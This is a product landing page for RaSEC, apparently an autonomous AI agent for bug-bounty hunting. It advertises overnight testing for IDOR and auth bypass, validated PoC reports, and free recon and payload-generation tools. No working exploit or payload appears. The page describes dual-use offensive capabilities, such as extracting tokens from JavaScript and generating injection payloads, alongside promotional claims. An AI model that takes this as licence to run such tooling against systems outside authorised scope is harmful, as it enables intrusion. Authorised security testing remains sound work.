The agent that hunts while you sleep.
RaSEC is a fully autonomous AI agent. It discovers endpoints, tests authorization patterns, validates findings deterministically, and delivers copy-paste-submit PoC reports by morning.
Capabilities
Built for serious hunters
Four core systems work together: autonomous hunting, zero-noise validation, real-time steering, and persistent memory.
Overnight Autonomous Hunting
Define your scope, hit start, go to sleep. By morning, RaSEC has crawled endpoints, tested authorization patterns, and validated every finding with deterministic reproduction.
- IDOR, auth bypass, access control bugs
- Prompt injection, race conditions (Elite)
- Scope-safe — no action leaves your boundary
Agent Workflow
- Scope load → boundary enforcement
- Endpoint crawl → auth flow extraction
- Vulnerability test → evidence collection
- Repro attempt → deterministic validation
- PoC report → copy-paste-submit
Zero-Noise Validation
Every HIGH/CRIT finding passes deterministic reproduction before it reaches you. Pending → Validated → Rejected — explicit lifecycle states, not confidence scores.
- No heuristic guesses or AI hallucinations
- Curl-reproducible evidence for every finding
- Baseline diff proves the vulnerability is real
Finding Lifecycle
- Discovery → signal detected
- Triage → severity classification
- Reproduction → deterministic proof
- Validation → confirmed or rejected
- Report → formatted for submission
Co-Pilot Steer Mode
You steer. It hunts. Redirect the agent mid-hunt, skip noisy paths, focus on a specific endpoint. Full operator control in real time.
- Focus: direct agent to specific endpoint
- Skip: deprioritize noisy paths
- Stop: halt execution after current agent
- Add target: inject new scope mid-hunt
Steer Commands
- → focus /api/v2/users/*
- → skip subdomain-finder
- → add_target api.staging.corp
- ← Agent redirected. Hunting /api/v2/users/*
- ← Found IDOR on GET /api/v2/users/{id}
Persistent Memory + RAG
The agent remembers. Past findings on the same target are recalled automatically. Elite tier adds semantic vector search across all hunts. No duplicate submissions, no re-testing known endpoints.
- Keyword recall: same target (Pro)
- Semantic RAG across all hunts (Elite)
- Automatic deduplication before report
Memory System
- Hunt #1: Found IDOR on /api/users/
- Hunt #2: Recalled finding → skipped
- Hunt #3: New endpoint /api/v3/admin/
- Hunt #3: Cross-referenced memory → novel
- Hunt #3: Validated → new PoC generated
Side-by-side
RaSEC vs the alternatives
| Capability | RaSEC Hunt | Burp Suite | Manual testing |
|---|---|---|---|
| Scope enforcement | Mathematical gate on every action | Scope config (easy to mis-run) | Rely on hunter discipline |
| Validation stance | Deterministic reproduction required | Raw findings — triage on you | Manual verification needed |
| PoC reports | Copy-paste-submit (H1/Bugcrowd) | Manual write-up required | Manual write-up required |
| Overnight runs | 3-5 concurrent sessions | Manual operation | Manual operation |
| Duplicate avoidance | Memory-based deduplication | No memory | Hunter memory only |
| Live mission log | Streaming plan + event log | Terminal streams only | Hunter notes only |
| Cost | $0 — $99/mo | $449/year | Your time |
Included free
8 security tools, no login
Use them standalone or let the hunt agent chain them together automatically.
URL Analysis
Find open redirects, SSRF indicators, and injection points in any URL.
Code Analysis
Scan source code for hardcoded secrets, insecure patterns, and injection sinks.
Subdomain Finder
Enumerate subdomains via DNS records, certificate transparency logs, and brute-force.
URL Finder
Discover hidden endpoints, admin paths, and API routes from any web application.
JS Recon
Extract API keys, internal endpoints, and auth tokens from JavaScript files.
Security Headers
Inspect HTTP security headers and detect missing CSP, HSTS, and clickjacking protections.
JWT Analyzer
Decode JWT tokens and test for algorithm confusion, weak secrets, and common exploits.
Payload Forge
Generate context-aware XSS, SQLi, SSRF, and SSTI payloads for security testing.
